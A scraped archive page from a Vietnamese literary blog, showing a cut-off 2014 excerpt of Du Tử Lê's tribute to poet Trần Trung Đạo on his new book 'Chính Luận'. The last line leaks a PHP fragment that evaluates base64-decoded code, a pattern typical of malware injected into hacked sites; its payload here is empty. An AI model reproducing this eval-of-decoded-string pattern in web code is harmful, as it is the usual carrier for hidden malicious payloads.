Archive for November 10th, 2014

Du Tử Lê: Trần Trung Đạo, trái tim nồng nàn dành cho tổ quốc Việt.

Du Tử Lê: Trần Trung Đạo, trái tim nồng nàn dành cho tổ quốc Việt.

dutule.com (ngày 10 tháng 11-2014): Nhà xuất bản Cổ Loa mới ấn hành tác phẩm tựa đề “Chính Luận” của nhà thơ nổi tiếng Trần Trung Đạo, ở Boston, Mass. Đây là tác phẩm thứ 10 của một tác giả có nhiều bài thơ được độc giả kh

11.10.2014 | Nhận Xét |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>